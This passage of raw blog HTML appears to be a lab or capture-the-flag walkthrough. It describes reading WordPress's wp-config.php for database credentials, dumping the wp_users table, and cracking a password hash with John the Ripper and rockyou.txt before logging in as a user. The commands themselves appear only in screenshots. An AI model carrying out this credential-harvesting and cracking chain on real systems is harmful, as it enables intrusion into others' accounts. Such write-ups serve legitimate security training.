/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;/weblog&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEis3SGKmFMcxtdgg_tDzVAQqkO228jVo6bU2sDrCYJU967SfmP9zhP9MvLCulMTuIvKmxZEtT0KQvwkRSnXlm_QJbE0-9fdo1uq--ZgzRfpAT06-JLP2B_iTxOCRnv6QUyrJyaOzqYqHiXnMBJt3JYkXu7AL9F1Xs-tlKRNZ9eQQZ3HQBHILe93WE_LQg&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;52&quot; data-original-width=&quot;257&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEis3SGKmFMcxtdgg_tDzVAQqkO228jVo6bU2sDrCYJU967SfmP9zhP9MvLCulMTuIvKmxZEtT0KQvwkRSnXlm_QJbE0-9fdo1uq--ZgzRfpAT06-JLP2B_iTxOCRnv6QUyrJyaOzqYqHiXnMBJt3JYkXu7AL9F1Xs-tlKRNZ9eQQZ3HQBHILe93WE_LQg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;wp-config.php&lt;/b&gt; we discover database credentials &lt;b&gt;root:mysql&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhXF9dhcRgqcJnNBg1sfdexkOw2iyxGOgFD14aMKMkFjeqXgMuQ8LythVPIyOZ5kCIWMUJwm7xPUYXK4seuNadNkeb3kxmL8LT_AhWXSBM3EYuJz5HNKuknmcdvXPLN5E8-m5pQbAH4edVt8VK052XMVFdS6GbFr7ysZxjbDug_UcuM2SPLH5qpHepR6g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;704&quot; data-original-width=&quot;806&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhXF9dhcRgqcJnNBg1sfdexkOw2iyxGOgFD14aMKMkFjeqXgMuQ8LythVPIyOZ5kCIWMUJwm7xPUYXK4seuNadNkeb3kxmL8LT_AhWXSBM3EYuJz5HNKuknmcdvXPLN5E8-m5pQbAH4edVt8VK052XMVFdS6GbFr7ysZxjbDug_UcuM2SPLH5qpHepR6g=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Entering the database:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjmI4w1UhDHxqFNudpX5benbPjUh6IPB4PQ5cI5uOZPlSa6yIvdryBuYJ87Q_qLzohohp2rh-ytaPcHmgQTjXOfEHpk8xZdnpMru5xPUVAh8VGbHEVUuEKvCArdCLrC_TEmu0Nq6-s5CNYARDljgHTV6o3uinMTrlSL8Sww7tR7wEm7N4M0IiThcdqGOg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;391&quot; data-original-width=&quot;905&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjmI4w1UhDHxqFNudpX5benbPjUh6IPB4PQ5cI5uOZPlSa6yIvdryBuYJ87Q_qLzohohp2rh-ytaPcHmgQTjXOfEHpk8xZdnpMru5xPUVAh8VGbHEVUuEKvCArdCLrC_TEmu0Nq6-s5CNYARDljgHTV6o3uinMTrlSL8Sww7tR7wEm7N4M0IiThcdqGOg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Showing databases:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjZ5rntTZT1sAaJze3oJJJUGj1BCcDMbPpOBubqo_FA2Z93tPypW4CHR_qBi4dKimikqgK3p6Gqo1q52fhiJMYU6mgqn8f0uuYiCbH73UBOBt6qz5G6Ot_0YrCrWjHe73ru8mQ-V0WgtwxZL-PQI9bPsfsB55lVwsF5wL_aOcNklAg92CEMmkZ6sajK6A&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;287&quot; data-original-width=&quot;290&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjZ5rntTZT1sAaJze3oJJJUGj1BCcDMbPpOBubqo_FA2Z93tPypW4CHR_qBi4dKimikqgK3p6Gqo1q52fhiJMYU6mgqn8f0uuYiCbH73UBOBt6qz5G6Ot_0YrCrWjHe73ru8mQ-V0WgtwxZL-PQI9bPsfsB55lVwsF5wL_aOcNklAg92CEMmkZ6sajK6A=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Using database &lt;b&gt;wordpress&lt;/b&gt; and looking for tables inside it:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEheSqGFNJC7hvYticCxd8B8Ww8BMzp-ARzxSHKnYNjd40vWlOP56thWX2wSO-uaRygyFFHYM_cLi-VidEWwvRzw2epXE7mQwtSWIB3bFYOw8U8ppKDnYP9USrAVSPCXWMjOKzC0VwphhYpC65KMeEJ35w8P1TIWUSk0J4s7DaHDHRuYeKq-ZVlG5oe6lQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;661&quot; data-original-width=&quot;434&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEheSqGFNJC7hvYticCxd8B8Ww8BMzp-ARzxSHKnYNjd40vWlOP56thWX2wSO-uaRygyFFHYM_cLi-VidEWwvRzw2epXE7mQwtSWIB3bFYOw8U8ppKDnYP9USrAVSPCXWMjOKzC0VwphhYpC65KMeEJ35w8P1TIWUSk0J4s7DaHDHRuYeKq-ZVlG5oe6lQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Selecting all from table &lt;b&gt;wp_users&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhll6se_1LldyB1LIvAUVZkiUGyZN5-qe0yCXa3K6yAFW2rN-AvHrzD5aV30WU4J79OejvhKjjh7XBdu8L9Sbg7E8iQgE_Oww6GuWl_6aaaUBTry5q4DO_GN6id1t_vN3knhCLWzAsVXW8DccNU_DEC7Rt-iTHJDPLadEWRiCCTvPiJLPMLj52Jb8j71w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;352&quot; data-original-width=&quot;1163&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhll6se_1LldyB1LIvAUVZkiUGyZN5-qe0yCXa3K6yAFW2rN-AvHrzD5aV30WU4J79OejvhKjjh7XBdu8L9Sbg7E8iQgE_Oww6GuWl_6aaaUBTry5q4DO_GN6id1t_vN3knhCLWzAsVXW8DccNU_DEC7Rt-iTHJDPLadEWRiCCTvPiJLPMLj52Jb8j71w=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Let&#39;s focus our attention on these encrypted credentials:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgE4KRQhfRB6tiipoZ5FyJF5wBYfIxDZX2U3nAcZcqQZ25XnKmU13Ka3xNvYexDMGbr4v_QB_MWHlUh4TyUr-aH0kF1RRGy2jzF5nLuGJ97nC8niW1gtl4CG4WBZlQ7jTHr8Jp4OynMLQdi66cxhsGqQd0ktehL7FFgGxxcqgJGGKd472wSe4BguUgfRQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;24&quot; data-original-width=&quot;541&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgE4KRQhfRB6tiipoZ5FyJF5wBYfIxDZX2U3nAcZcqQZ25XnKmU13Ka3xNvYexDMGbr4v_QB_MWHlUh4TyUr-aH0kF1RRGy2jzF5nLuGJ97nC8niW1gtl4CG4WBZlQ7jTHr8Jp4OynMLQdi66cxhsGqQd0ktehL7FFgGxxcqgJGGKd472wSe4BguUgfRQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiQMG8kCp5Ecw7CJn6rEe99LK9d8Rsd08J6VBb9RDlhzt_neJItYejiM3CRBbRPsbpn27VeHIhz7ytUpyPEKFDWrm5FBPTbiVkfxWBDwkwFtuLA4f4Vmj1sgCU5eEeF0snHAu0XRg_Z0q0KMn12UT-a4aUjVYWu2cVl_7Sp98Io7sjI4mWg2CmZYnAbBA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;23&quot; data-original-width=&quot;543&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiQMG8kCp5Ecw7CJn6rEe99LK9d8Rsd08J6VBb9RDlhzt_neJItYejiM3CRBbRPsbpn27VeHIhz7ytUpyPEKFDWrm5FBPTbiVkfxWBDwkwFtuLA4f4Vmj1sgCU5eEeF0snHAu0XRg_Z0q0KMn12UT-a4aUjVYWu2cVl_7Sp98Io7sjI4mWg2CmZYnAbBA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Creating file text &lt;b&gt;p&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjNf0J9qVWpUTTRlsjGrI_EEiQWrh5gmYv9srnuHF0T0YkT64s9AuBt_AxLXPH5hAC7NCySZ2QQoBnPYOScDaXJUEREWvwe6AD76nDS_LqI86wG6FsSEWi0mb7wCJELoxiO637NURMpSqQFqlNX9gettleeQu3SHChF2g9CljhK-Pj4hVATcpZXsYaq-A&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;62&quot; data-original-width=&quot;370&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjNf0J9qVWpUTTRlsjGrI_EEiQWrh5gmYv9srnuHF0T0YkT64s9AuBt_AxLXPH5hAC7NCySZ2QQoBnPYOScDaXJUEREWvwe6AD76nDS_LqI86wG6FsSEWi0mb7wCJELoxiO637NURMpSqQFqlNX9gettleeQu3SHChF2g9CljhK-Pj4hVATcpZXsYaq-A=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhiUBIKxQCLl20pAt5zS4YuqoKYa3oJJ6Y4LLNLNVfYzqm_vVZPd5Kshn6G_pBIvyxicQGe83TFbE5cLe6hrOyumw3G32NxoDeg4m9JjJxRuZ5DryARmh9tOqhzp8KAnAaiOyeHdvIONgJHIkQx-AaAKcI0Jxl1Pq7pgDPV-jEpAvbUJ_F_cyec9p1MJA&quot; style=&quot;clear: left; display: inline !important; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;78&quot; data-original-width=&quot;523&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhiUBIKxQCLl20pAt5zS4YuqoKYa3oJJ6Y4LLNLNVfYzqm_vVZPd5Kshn6G_pBIvyxicQGe83TFbE5cLe6hrOyumw3G32NxoDeg4m9JjJxRuZ5DryARmh9tOqhzp8KAnAaiOyeHdvIONgJHIkQx-AaAKcI0Jxl1Pq7pgDPV-jEpAvbUJ_F_cyec9p1MJA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Identifying what type of encryption is used:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhOxBuCEiQXeRoa8W7V9sDuwNpXpB9jf4AeDJxRE2wb94B1lVO6FXir6eMWiof3_XgHDdtZNdTwVfNY4OV8HuZVIqw2shsZu-BjwyJ4BUr6_5aiFLvJAlufOE3F8ISY8SNyeZXaMe-PQZGAVZu72okGqsTkKlBOszgi8bywVMVBjcu3PFiGq3d5qWTTTg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;583&quot; data-original-width=&quot;860&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhOxBuCEiQXeRoa8W7V9sDuwNpXpB9jf4AeDJxRE2wb94B1lVO6FXir6eMWiof3_XgHDdtZNdTwVfNY4OV8HuZVIqw2shsZu-BjwyJ4BUr6_5aiFLvJAlufOE3F8ISY8SNyeZXaMe-PQZGAVZu72okGqsTkKlBOszgi8bywVMVBjcu3PFiGq3d5qWTTTg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Applying &lt;b&gt;John The Ripper&lt;/b&gt; and wordlist &lt;b&gt;rockyou.txt&lt;/b&gt; we discover password &lt;b&gt;wedgie57&lt;/b&gt;:&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEizl5QS95n8vOSJj2PufP4lSONammxxmrn9G_KGwQzzfeQ33YGitOfKv_GSvDk3ULOu4bafORzv6OiIqVVCHVLwK_MwziQynReTtvlWNwA6n_EgJq4lUvDJ62juUEFjmsOHo4K3iP9R4ThhiSCbRMv93miFpNUBc6w-YYXlVBy8om0nATiu6EBqnWmBjw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;209&quot; data-original-width=&quot;373&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEizl5QS95n8vOSJj2PufP4lSONammxxmrn9G_KGwQzzfeQ33YGitOfKv_GSvDk3ULOu4bafORzv6OiIqVVCHVLwK_MwziQynReTtvlWNwA6n_EgJq4lUvDJ62juUEFjmsOHo4K3iP9R4ThhiSCbRMv93miFpNUBc6w-YYXlVBy8om0nATiu6EBqnWmBjw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Using these password&lt;b&gt; wedgie75&lt;/b&gt; for user &lt;b&gt;unclestinky&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhfIaOrrhe0bFdJzLFudZaG1nT2oxmBFd0gfhDmgnGKllfHoIP6iHhWGMznTHuBlY2ru0XyH_bMzkBfL_y-H_xS1dD6SvBzoa_2dKGth-KlA1JvR0ccqdXDRxPOldSLEVI9vTEHYjZs7z5NwxFm_PlwTswkhtz7LnDwan769ogz-m76_-HCBbDxhWG29w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;659&quot; data-original-width=&quot;543&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhfIaOrrhe0bFdJzLFudZaG1nT2oxmBFd0gfhDmgnGKllfHoIP6iHhWGMznTHuBlY2ru0XyH_bMzkBfL_y-H_xS1dD6SvBzoa_2dKGth-KlA1JvR0ccqdXDRxPOldSLEVI9vTEHYjZs7z5NwxFm_PlwTswkhtz7LnDwan769ogz-m76_-HCBbDxhWG29w=w527-h640&quot; width=&quot;527&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 